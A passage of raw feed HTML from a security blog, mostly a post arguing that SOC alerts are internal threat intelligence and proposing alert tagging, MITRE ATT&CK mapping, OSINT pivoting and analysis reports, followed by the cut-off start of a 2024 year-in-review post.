to triage and analyse an alert, usually involving OSINT and other forms of threat intelligence.</p></li></ol><p>And before the AI evangelists raise AI as the solution to the problems above let me say &#8220;yes&#8221;, you can use automation and AI to enrich your alerts with intel and other information. So what? Suddenly, human triage and analysis are no longer needed? If that&#8217;s the case, why would you still <strong>need alerts</strong>?</p><p>Alerts are human <em>attention</em>-sucking artefacts that are there for the purpose of <em>actioning something</em>.</p><p>If human validation is not required as an intermediary between the trigger (alert) and the action (a change to the system), then you have 100% automation right there. No need for alerts. They would simply add needless friction.</p><p>As much as a lot of people would love to believe it, as of 2025, <em>we are not there yet</em>.</p><p>Try to explain to your customers and clients that their precious personal data, money or resources are 100% protected by automated Bots and AI agents, no human ever validating, triaging, or investigating anything.</p><p><em>The gurus of the automated-block-chain-quantum-powered-AI-driven world forget that humans are also an interface</em>. You need to talk to our messy, biased and conflicting biological APIs too. We are far away still from the automaton CEO.</p><p>Alerts and security analysts are here to stay. But how can we reduce burnout, placate turnover and extract high-value information from our SOC?</p><p>Could we transform your SOC into an intel provider? Could your analysts perform more complex and better value-add data analysis? Could we proactively inject this information back into our security controls?</p><h1>The Slap</h1><p>Some time ago, I had a realisation: <strong>an alert is essentially internal threat intel</strong>.</p><p>This led me to the next more profound realisation: <strong>any refined information about the risks to your systems and data </strong><em><strong>is intel</strong></em>.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-vDo!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-vDo!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 424w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 848w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 1272w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-vDo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg" width="1456" height="1016" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1016,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:&quot;From Intel to Impact&quot;,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!-vDo!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 424w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 848w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 1272w, https://substackcdn.com/image/fetch/$s_!-vDo!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F0310aca2-dc6c-4f83-b04a-90f79b38b206_321x224.svg 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Wait a second bro, are you saying that the kinds of alerts you create by engineering detections are intel? Yes, I'm talking about the types of notables, warnings, observables or alerts that an EDR or SIEM would raise.</p><p>If we boil it down to the essentials, an alert is:</p><ul><li><p><strong>A claim about the state of events in a system</strong><br>The claim can be <em>true</em> or <em>false</em> but is an interpretation of the system's state at a point in time. I will provide a <em>basic </em>example first, a plain and isolated alert: <em>&#8220;Suspicious network activity detected: Multiple failed login attempts from an unusual IP address on a server hosting customer financial data&#8221;.<a class="footnote-anchor" data-component-name="FootnoteAnchorToDOM" id="footnote-anchor-1" href="#footnote-1" target="_self">1</a> </em></p></li><li><p><strong>A state of events that indicates a departure from the expected or desired state of the system</strong><br>In other words: <em>a risk</em>. A state of affairs in the system capable of introducing disruptions that may impact the regular behaviour of the system. Following up on our example above, while failed login attempts can happen (users mistyping passwords), was there in the end a successful login attempt? A successful login attempt after multiple failures from an unusual IP address is a strong indicator of unauthorized access. This situation introduces a risk vector.</p></li><li><p><strong>Information that normally requires validation, triage and analysis</strong><br>So that it can inform some action. We raise alerts because they should prompt some sort of action. If human attention wasn't required, it wouldn't be called an alert, it would simply be a fully automated logic chain.</p></li><li><p><strong>Information that is normally enriched with added contextual information</strong><br>To build a situational awareness graph: who, what, when, where, why.</p></li></ul><p>Threat Intelligence is:</p><ul><li><p><strong>A claim about the state of events in a system</strong><br>The "system" happens to be the wider internet with all its nebulous digital metaverse and points of contact with our internal and external networks. In intel terms, we call it the <em>"threat landscape"</em>. The claims made about this landscape can apply or not to your environment, and they can be <em>true</em> or <em>false</em> (not all intel is equally accurate) about the state of affairs it describes. It represents, however, an interpretation of observed data. Example of what you could find in a threat report: <em>Recent observations indicate a surge in brute-force login attempts targeting financial institutions globally. Attackers are leveraging automated tools and botnets to systematically guess user credentials and gain unauthorized access to sensitive systems. This activity aligns with the broader trend of financially motivated cybercrime, with attackers seeking to exploit vulnerabilities for financial gain.</em></p></li><li><p><strong>A state of events that indicates a departure from the expected or desired state of the system</strong><br>Information about <em>potential or realised violations </em>to the confidentiality, availability or integrity of data, perpetrated by threat actors, that indicates a significant enough departure from a desired state of the world conducive to peaceful business. Something signals danger and hits the business risk thresholds: "too close to home".</p></li><li><p><strong>Information that normally requires validation, triage and analysis</strong><br>So that it can inform some action. If human brain attention wasn't required, it wouldn't be called threat intelligence. It is we, hominids, that experience this perceptual construct called a "threat".</p></li><li><p><strong>Information that is normally enriched with added contextual information</strong><br>Threat intel is a narrative knowledge graph that is more or less enriched and informs situational awareness.</p></li></ul><p>I'm sure there are many flaws in my analogy, but beyond the commonalities and differences you may find too, the point of this realisation that slapped me in the face like a rogue frisbee on a windy day, is that <strong>intel is refined information about a state of affairs (be it systems, people or data) with the purpose of prompting actions to reduce the risk of your business operations.</strong></p><p>Intel should slap you in the face.</p><p>(gently of course, unless you are doing everything wrong).</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!3ktq!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!3ktq!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 424w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 848w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 1272w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!3ktq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png" width="576" height="393.8656126482214" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:false,&quot;imageSize&quot;:&quot;normal&quot;,&quot;height&quot;:519,&quot;width&quot;:759,&quot;resizeWidth&quot;:576,&quot;bytes&quot;:460210,&quot;alt&quot;:&quot;From Intel to Impact&quot;,&quot;title&quot;:&quot;From Intel to Impact&quot;,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="From Intel to Impact" title="From Intel to Impact" srcset="https://substackcdn.com/image/fetch/$s_!3ktq!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 424w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 848w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 1272w, https://substackcdn.com/image/fetch/$s_!3ktq!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F9371e588-d6d6-4aaa-8c17-890e6fe812e8_759x519.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">caption...</figcaption></figure></div><p>If it doesn&#8217;t slap you in the face, then it won&#8217;t prompt any actions from you.</p><p>But what if you don&#8217;t need to merely look outside to gather intel? What if you could mine intel internally and look a things from a different angle?</p><h1>Your SOC as an Intel Provider?</h1><p>As mentioned at the beginning, what are the two main detrimental factors all SOCs struggle with? &#8594; Burnout and Boredom.</p><p>SOCs out there suffer from high turnover and burnout rates. Good and ambitious analysts will yearn for more and want to be part of more complex initiatives, solving bigger problems.</p><p>What distinguishes an average analyst or engineer from one with potential for senior or lead roles is not just deepening technical skills but something even rarer: their ability to look at problems from one level up.</p><p>Aspiring senior engineers and analysts are the ones who apply themselves to identifying the patterns in problems. They don&#8217;t just focus on the task at hand. Excelling at the task at hand will only make you better at doing more of those tasks.</p><p>Engineers who identify patterns realise that there always is a higher level order where the problem exists. Like a unidimensional line that is part of a two-dimensional rectangle or three-dimensional cube.</p><p>Over the long term, being good at simple lines won&#8217;t make you good at rectangles. In the same way, focusing solely on being the best rectangle drawer won&#8217;t get you to cubes.</p><p>If alerts engineered by a detection team and triaged by a security analyst can be considered internal threat intelligence, shouldn&#8217;t your SOC become an intel provider?</p><p>There are many ways in which we can do this:</p><ol><li><p><strong>Tag your data.</strong> Most SOCs already do this by default.</p></li><li><p><strong>Map MITRE and OSINT metadata to Threat Actor profiles.</strong></p></li><li><p><strong>Develop data analysis reports.</strong></p></li><li><p><strong>Feed intel back into the system as threat-hunting or detection initiatives.</strong></p></li></ol><h2>Tag your data</h2><p>By tagging your alert data, you generate metadata that can be later used to either perform high-level trend analysis or to train machine learning algorithms that can predict whether a particular alert deserves a little, average or a lot of attention.</p><p>Some of these tags may also come pre-applied via detection engineering or automation.</p><p>Usual tags used by SOCs out there for their alerts:</p><ul><li><p><strong>Severity/Priority</strong> (<code>High</code>, <code>Medium</code>, <code>Low</code>, <code>Critical</code>, <code>Informational</code>)</p></li><li><p><strong>Threat/Attack Type</strong> (<code>Brute-force</code>, <code>Phishing</code>, <code>Malware</code>, <code>DDoS</code>, <code>SQLi</code>, <code>XSS</code>, <code>Insider Threat</code>, <code>Data Exfiltration</code>, <em>use a more granular and comprehensive taxonomy based on your specific needs and common threats. MITRE ATT&amp;CK can help inform this.</em>)</p></li><li><p><strong>MITRE ATT&amp;CK Framework</strong> (<code>Tactic</code>: <code>TA0006</code> (Credential Access), <code>TA0003</code> (Persistence), <code>TA0011</code> (Command and Control); <code>Technique</code>: <code>T1110</code> (Brute Force), <code>T1547.001</code> (Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), etc.)</p></li><li><p><strong>Confidence Level</strong> (<code>Confirmed</code>, <code>Suspected</code>, <code>High Confidence</code>, <code>Low Confidence</code>)</p></li><li><p><strong>False Positive/Benign</strong> (<code>False Positive</code>, <code>Benign</code>, <code>Expected Activity</code>, etc.)</p></li><li><p><strong>Asset/System</strong> (<code>DMZ Server</code>, <code>Web Application</code>, <code>Endpoint</code>, <code>Database Server</code>, <code>VPN</code>, <em>Tag the specific asset or system affected.</em>)</p></li><li><p><strong>User</strong> (<code>Admin</code>, <code>Employee</code>, <code>Contractor</code>, <code>System Account</code>)</p></li><li><p><strong>Data Source</strong> (<code>Firewall</code>, <code>IDS/IPS</code>, <code>EDR</code>, <code>SIEM</code>, <code>Log File</code>)</p></li><li><p><strong>Status/Action Taken</strong> (<code>Blocked</code>, <code>Quarantined</code>, <code>Investigated</code>, <code>Remediated</code>, <code>Needs Review</code>)</p></li><li><p><strong>Evidence Collected</strong> (Registry, Files, etc.)</p></li></ul><h2><strong>Map MITRE and OSINT metadata to Threat Actor profiles</strong></h2><p>Your first alert triage will normally reduce the volume of alerts that deserve attention by filtering out initial noise.</p><p>The remaining alerts, the ones deserving further investigation, should be accompanied by extensive OSINT investigations.</p><p>Perhaps a suspicious logon attempt from an unusual public IP to a high-risk service that is part of the infrastructure of your crown jewels ends up being a false positive, but what if you follow the trace of that IP?</p><ul><li><p>what ASN does it belong to?</p></li><li><p>are there IPs in that ASN block that are or have been associated with malware callbacks or threat actors?</p></li><li><p>if you perform OSINT pivoting and find various samples of malware calling back to sibling IPs inside the same ASN, what do these samples have in common?</p></li><li><p>are there any threat actors out there known to actively exploit the types of services (e.g. IIS, Apache HTTP Server, etc.) the alert is pointing to?</p></li></ul><p>Your investigation might return a false positive, but in order to arrive at that you had to well&#8230; perform an investigation. In doing so, you will find a lot of information that can be mined and used to further protect your systems.</p><p>Granted, <em>the correlation factor is low</em>. There is a huge element of serendipity in this approach.</p><p>But in researching information that helps you decide whether to escalate or discard an alert, you usually stumble upon useful information that can be operationalized.</p><p>An alert is an artefact that was created by a detection engineer somewhere along the chain (3rd party or in-house) and only made it to your data lake because someone decided it was significant enough to indicate a potential attack technique. This decision is made by act or omission, intentional or implied, but it&#8217;s a decision nonetheless.</p><p>If this attack technique is significant enough to be highlighted, why wouldn&#8217;t it be significant enough as a trigger that enables the investigation of which threat actors and which IOCs match those patterns over the last 6 months?</p><p>Threat Intelligence Teams out there don&#8217;t <em>always</em> have better criteria to choose one campaign or threat actor over another. Starting with the attack paths and techniques your organisation <em>thinks</em> are the most relevant is as good a start for OSINT as any (I will leave the need for threat modelling for another post).</p><p>We are mostly looking to mine relevant and usable IOCs here. They are perishable yes, but useful too if consumed at the right time and disseminated to your blocking controls.</p><p>Grab the information your security analysts produce with sweat and tears and map it to available threat actors.</p><p><strong>You are NOT doing attribution here, you are simply doing correlation</strong>. Mapping will help you create a map of which techniques you mostly observe triggering and which threat actors they are associated with.</p><p>Even all the commodity attacks blocked at your perimeter like phishing emails with weaponized attachments can be a source of intel your SOC could utilise:</p><ul><li><p>what are the most common types of malware blocked at the perimeter?</p></li><li><p>who are the most frequently targeted users? are there any patterns there?</p></li><li><p>if you detonate some of the samples in dynamic analysis environments, which domains and IPs are they calling back?</p></li><li><p>can you gather the list of callback IPs and domains and preemptively block them in case there are weaponised docos that can evade your perimeter controls?</p></li></ul><p>You can see where this is going&#8230; bring in the lens of threat intel to your SOC operations.</p><h2>Develop data analysis reports</h2><p>Give your analysts the chance to collate all the data gathered in the previous steps.</p><p>Challenge them to craft meaningful data analysis reports:</p><ul><li><p>What&#8217;s the trend of TTPs whose alerts trigger in your environment? &#8212;&gt; you need to ask yourself why this happens</p></li><li><p>Which clusters of activity were investigated during the analysis of an alert?</p></li><li><p>What are the top 10 FP that need to be urgently tuned? &#8212;&gt; this helps reduce the grind</p></li><li><p>How many IOCs did the SOC mine from the internet and applied to security controls? &#8212;&gt; demonstrates value add and proactivity</p></li><li><p>What is the MITRE mapping from TTPs &#8212;&gt; Alerts &#8212;&gt; Threat Actors? &#8212;&gt; this could shed some light on neglected areas</p></li><li><p>How many of your alerts are mapped to high-risk assets or crown jewels?</p></li></ul><p><strong>Allow your analysts to move one level up in strategic thinking</strong>, challenge them to analyse the high volumes of meta-data collected during a sprint or a month and produce relevant metrics.</p><h1>Auf wiedersehen</h1><p>I know some of the ideas put forward here have lots of caveats, I don&#8217;t intend to offer instantaneous solutions to all our problems.</p><p>I&#8217;m more about kicking off the conversation.</p><p><em>What do you think about this article?</em></p><p>I will enable a chat on Substack for all the subscribers so you can air your voice there :)</p><div class="footnote" data-component-name="FootnoteToDOM"><a id="footnote-1" href="#footnote-anchor-1" class="footnote-number" contenteditable="false" target="_self">1</a><div class="footnote-content"><p>Why is this a basic example? because there is no comparative risk weighing or correlation. A better example would include a risk score attached to an entity like the IP address, the usernames employed (in case of password spraying), the targeted server, etc.</p></div></div>]]></content:encoded></item><item><title><![CDATA[A Year in Review: The Tales of a Cyberscout in 2024]]></title><description><![CDATA[From Threat Research Frameworks to Cyber Operations]]></description><link>https://www.quasarops.com/p/a-year-in-review-the-tales-of-a-cyberscout</link><guid isPermaLink="false">https://www.quasarops.com/p/a-year-in-review-the-tales-of-a-cyberscout</guid><dc:creator><![CDATA[Diego Perez]]></dc:creator><pubDate>Sun, 05 Jan 2025 05:18:29 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!ZnZt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!ZnZt!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!ZnZt!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 424w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 848w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 1272w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!ZnZt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png" width="396" height="228.46153846153845" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:840,&quot;width&quot;:1456,&quot;resizeWidth&quot;:396,&quot;bytes&quot;:1482906,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!ZnZt!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 424w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 848w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 1272w, https://substackcdn.com/image/fetch/$s_!ZnZt!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F44a6ed81-4caf-4c3f-a7e5-c13170b616c4_1664x960.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><h2>Zetabytes of Ideas</h2><p>And just like that, we concluded another full cycle around the sun.</p><p>A lot was written in 2024 by the inhabitants of this online metaverse: rivers of ink as a common Spanish saying goes. It&#8217;s crazy to think that data creation in 2025 is <a href="https://spacelift.io/blog/how-much-data-is-generated-every-day">predicted to reach an astonishing 181 ZB</a>.</p><p>In this vast ocean of data, my musings are barely a drop within a drop.</p><p>Life happened. I wasn&#8217;t able to write as much as I would have liked last year, a situation I hope to remediate in 2025. </p><p>I&#8217;m grateful for all my readers, and those of you who sent so many DMs and engaged in interesting conversations. Some of the most engaging dialogues I&#8217;ve had in the last 12 months happened with people that were new to the field, or looking for orientation towards a flourishing career.</p><p>In this article, I will share the central ideas of all the writings from 2024, which I hope some of you have found insightful.</p><h2>Key ideas shared in 2024</h2><p>When looking at the articles I wrote last year, the volume has been low in terms of quantity. However, I think the aggregated volume of ideas shared was massive.</p><p>I think the central topic that drove my efforts can be summarised as follows: <em>how can we extract meaningful information from threat intelligence so that it can drive proactive cyber defence and uplift security controls?</em></p><p>It sounds simple, but if it were, why is it so difficult for many organizations out there to truly build <strong>structural and situational awareness driven by threat intelligence</strong>?</p><p>These two types of awareness, structural and situational, were introduced in the <a href="https://www.amazon.com.au/Cyber-Defense-Matrix-Navigating-Cybersecurity/dp/B09QP2GSGZ">Cyber Defence Matrix by Sounil Yu</a>. Sounil traces a difference between activities that happen left of boom and right of boom. A &#8220;boom&#8221; is an undesirable event that occurs between PROTECT and DETECT, a disruption to regular business operations operated by a cyber threat.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!h3I0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!h3I0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 424w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 848w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 1272w, https://substackcdn.com/image/fetch/$s_!h3I0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2314ebca-0f60-43fe-b6a6-2ce7813d7040_1355x800.png 1456w" sizes="100vw"><img 